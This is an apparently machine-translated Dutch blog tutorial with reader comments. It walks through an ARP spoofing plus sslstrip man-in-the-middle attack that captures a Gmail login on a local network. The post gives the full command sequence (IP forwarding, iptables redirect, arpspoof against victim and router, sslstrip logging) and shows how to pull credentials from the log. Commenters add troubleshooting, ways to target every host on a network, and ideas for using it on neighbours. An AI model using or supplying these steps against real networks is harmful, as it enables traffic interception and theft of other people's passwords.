ArpSpoofing en SSlstrip in actie.

Hallo bloggers.

Voor vandaag heb ik een klein voorbeeld van hoe gevaarlijk het kan zijn om verbonden te zijn met elk netwerk zonder beveiliging van diegenen die zo velen van ons leuk vinden.

Voor vandaag ga ik ArpSpoofing gebruiken met Sslstrip om een ​​Gmail-wachtwoord te krijgen. Om de omgeving meer gecontroleerd te maken, heb ik een account aangemaakt met de naam "testarp@gmail.com'.

En aangezien ik de preambules niet erg leuk vind, laten we aan de slag gaan.

Ik ben op geen enkel moment verantwoordelijk voor wat ze kunnen doen met de volgende informatie. Ik doe het uitsluitend voor educatieve doeleinden

MILIEU

Voor deze test hebben we het volgende:

1. Aanvaller: Het is mijn desktop- of desktopcomputer die Debian Wheezy heeft. Van repositories die u kunt installeren SSL-strip y snuif te krijgen harpspoofing

2. Slachtoffer: Het slachtoffer is een Android-tablet die alleen zijn mail via de browser wil zien.

3. Het medium: Het midden is mijn Cisco DPC2425-router

ADRESSEN.

Adres aanvaller: 172.26.0.2

Router adres: 172.26.0.1

Adres slachtoffer: 172.26.0.8

DE AANVAL:

Om een ​​beetje meer te begrijpen hoe de aanval werkt, kun je naar mijn oude gaan POST

Het eerste dat we voor deze aanval zullen doen, is de forward activeren, zodat onze computer de informatie naar het slachtoffer kan doorsturen zonder het te beseffen. (Anders zou het een denial of services-aanval zijn)

Daarvoor gebruiken we:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Elke opdracht in een direct consolevenster.

Als we nu staart -f doen desdelinux we zien de informatie live en direct

momentopname 1

Dus hoe krijgen we dan wat we willen?

Laten we eerst onze e-mail invoeren op de tablet. Tijdens het inloggen zien we dat er duizenden en duizenden dingen op onze console verschijnen.

Nu het klaar is, gaan we ons bestand openen “desdelinux” met nano

nano desdelinux

met Control + W zoeken we naar iets dat SECURE POST heet.

En we zullen zoiets zien.

momentopname 2

Onder die enorme lijn die niet kan worden gezien, is het e-mailadres en wachtwoord van het slachtoffer.

We rennen dus naar rechts totdat we eindelijk het licht aan het einde van de tunnel zien.

momentopname 3

Een andere keer zullen we zien hoe we onszelf een beetje tegen deze aanvallen kunnen beschermen.

groeten


Laat je reactie achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd met *

*

*

  1. Verantwoordelijk voor de gegevens: Miguel Ángel Gatón
  2. Doel van de gegevens: Controle SPAM, commentaarbeheer.
  3. Legitimatie: uw toestemming
  4. Mededeling van de gegevens: De gegevens worden niet aan derden meegedeeld, behalve op grond van wettelijke verplichting.
  5. Gegevensopslag: database gehost door Occentus Networks (EU)
  6. Rechten: u kunt uw gegevens op elk moment beperken, herstellen en verwijderen.

  1.   @Jlcmux zei

    Ik maak van de gelegenheid gebruik om te zeggen dat toen de post werd gepubliceerd, de bevelen niet klopten.

    Het iptables-commando aan het einde mist de 8080 die op een andere regel staat. En toen stonden de arpspoof-commando's allemaal op dezelfde regel. Elk commando staat op een andere regel.

    Hopelijk ziet de redacteur het en kan hij het repareren.

    Groeten.

    1.    Handleiding van de Bron zei

      Ik heb de correcties die u noemt aangebracht, is dat oké?

      Als u code gaat invoegen in een voorkeursitem, gebruikt u de HTML-weergave en controleert u of het artikel correct is voordat u het naar in behandeling verzendt. Dank je.

  2.   Luis zei

    Het is beangstigend om te weten dat degenen onder ons die geen kennis hebben, zo kwetsbaar zijn. Zeer goede informatie, zelfs als ik weinig van het onderwerp begrijp, besef ik het belang ervan. Dank je!
    groeten

  3.   giskard zei

    Maar dat werkt alleen als de aanvaller en het slachtoffer zich in hetzelfde netwerk bevinden. In ieder geval lijkt het mij dat als je (als je op hetzelfde netwerk zit) verbinding maakt via HTTPS, dat niet gebeurt omdat de gegevens gecodeerd zijn VOORDAT je je computer verlaat. Als je verbinding maakt via HTTP (zonder S), denk ik dat je zelfs als je naar de netwerkkabel kijkt, de sleutels ziet.

    1.    @Jlcmux zei

      Het is niet waar. Ik hack een gmail-wachtwoord en als je merkt dat gmail https gebruikt. Zo? Het punt is dat hoewel https veilig is, het afhankelijk is van http. Dus het is niet zo veilig.

      Beken niet zoveel over een https dat de S niet voor Superman is, maar voor "veilig"

    2.    Rten zei

      het werkt met of zonder https, ik heb het geprobeerd met een meer gespecialiseerde linux-distro en het werkt zonder problemen

    3.    Handleiding van de Bron zei

      Je kunt het precies gebruiken om degenen die je wifi stelen een lesje te leren. 😀

      Het lijkt min of meer op wat ze lang geleden zeiden op de blog van Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant zei

        Ostia, geweldig wat het doet! / En dan vertellen ze mijn paranoïde elke keer dat ik de VPN gebruik wanneer ze de bankrekening gaan controleren ...). Je moet trouwens zien hoe cynisch mensen zijn in de reacties ...

        1.    eliotime3000 zei

          Nu moeten we een zelfstudie volgen over het maken en aanbieden van uw eigen VPN-service.

      2.    Daniel zei

        Het verhaal dat je linkt is erg interessant, het lijkt zelfs een romanboek waardig, en dit doet me herinneren dat ik het internet van mijn buren gebruikte en hoewel ik zeg dat ik het onderwerp ken, denk ik dat ik nooit de ware dimensies van het gevaar dat ik had kunnen blijven, gelukkig voor mij, hebben ze alleen het wachtwoord gewijzigd in WPA2 en daar begon mijn verhaal met de ISP haha

    4.    Mauricio zei

      Daarom zegt de titel Sslstrip in actie.

      Het werkt, zolang de aanvaller zich in het midden bevindt

  4.   aanstonds zei

    Welke golf werk je bij prisma? -.-
    Nr.
    Waar wacht je nog op om je verzoek te verzenden XD
    groeten
    goede post

  5.   auroszx zei

    Interessant, ik doe later een educatieve test ... Misschien kan ik zelfs het wachtwoord van de wifi verwijderen en een tijdje plezier hebben 😛
    Kun je toevallig iets soortgelijks doen om verschillende pagina's te sturen naar de pagina's waar het doel om heeft gevraagd? Ze willen bijvoorbeeld Facebook openen en ik stuur ze door naar Google? 😛

    1.    @Jlcmux zei

      Ja. Maar het is allemaal een heel andere rol.

      Misschien post ik het later wel.

  6.   laatste nieuweling zei

    zeer goed bericht, deze onderwerpen zijn erg leerzaam, nu moeten we deze aanval kunnen tegengaan, aangezien sommigen (zoals ik) verbinding maken met openbare netwerken (de universiteit bijvoorbeeld), zou het nuttig zijn om het te vermijden.

    Groeten!

  7.   gewoon-een-andere-dl-gebruiker zei

    Het werkte niet voor mij 🙁

  8.   Wauw zei

    Iets wat me hier niet lukt, afgezien van het feit dat de https-verbindingen worden versleuteld via een servercertificaat (zodra je het certificaat op je computer hebt, is je browser verantwoordelijk voor de versleuteling) met iptables stuur je poort 80 (http) om, niet 443 dat is https

    1.    @Jlcmux zei

      Dat dacht ik ook. Het punt is dat hoewel https "veilig" is, het helaas afhangt van http. Dus sslstrip maakt daar gebruik van, het laat de browser geloven dat het https-inloggegevens gebruikt, maar dat is niet zo.

      1.    Wauw zei

        heilige shit! maar de browser zou een waarschuwing moeten zien zoals "dit certificaat komt van een verdachte site of iets dergelijks" ... ik zal zeker XD testen moeten doen

        1.    @Jlcmux zei

          Nee, er komt absoluut niets uit.

  9.   gewoon-een-andere-dl-gebruiker zei

    Het werkte eindelijk voor mij
    Ik ben met een wachtwoord verbonden op een WEP-netwerk en het liet me het wachtwoord toch direct zien.

    Een vraag. Kunt u dezelfde procedure uitvoeren, maar voor alle computers die op het netwerk zijn aangesloten, in plaats van één slachtoffer te hebben?

    1.    @Jlcmux zei

      Ja dat kan. Maar ik heb geen experimenten gedaan. Probeer het zelf en vertel ons hoe het met u gaat.

  10.   Sinnick 19 zei

    Het enige dat ik hiermee krijg, is dat de machine van het slachtoffer offline gaat, maar de sslstrip laat me niets zien: /

    1.    @Jlcmux zei

      U moet de firewall even uitschakelen. Of schakel in ieder geval inkomende verbindingen in.

  11.   Mr Black zei

    Probe en ik konden alleen de gebruikersnaam en het wachtwoord van de facebookpagina zien, in gmail vond ik geen enkel resultaat in het log, ook had ik alleen een regel arpspoof «arpspoof -i -t« nodig. Aan de andere kant kon de slachtoffer-machine sommige pagina's niet openen. Ik zal verder onderzoeken, het is erg interessant. Een hulp voor degenen die Manjaro gebruiken, de pakketten om te installeren zijn: dsniff (hier is arpspoff), twisted en python2-pyopenssl. Sslstrip kan hier worden gedownload: http://www.thoughtcrime.org/software/sslstrip/
    Om het uit te voeren $ python2 sslstrip.py
    Groeten.

  12.   Mr Black zei

    Het kwam niet uit, maar de arpspoof-regel is: #arpspoof -i int -t ip-slachtoffer ip-router

  13.   gilbert zei

    kijk ik doe precies wat je zegt:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –naar-poorten 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Het probleem is dat het slachtoffer, een andere pc die ik hier in mijn kamer heb, geen verbinding heeft tot het punt dat ik de router opnieuw moet opstarten. Wat kan ik doen, help me.

    Nog iets dat ik met een virtuele machine werk, en wanneer ik het iwconfig-commando uitvoer, verschijnt wlan0 niet, noch wanneer ik ifconfig uitvoer, maar als ik internet op mijn virtuele machine heb, wat met een eth0-interface.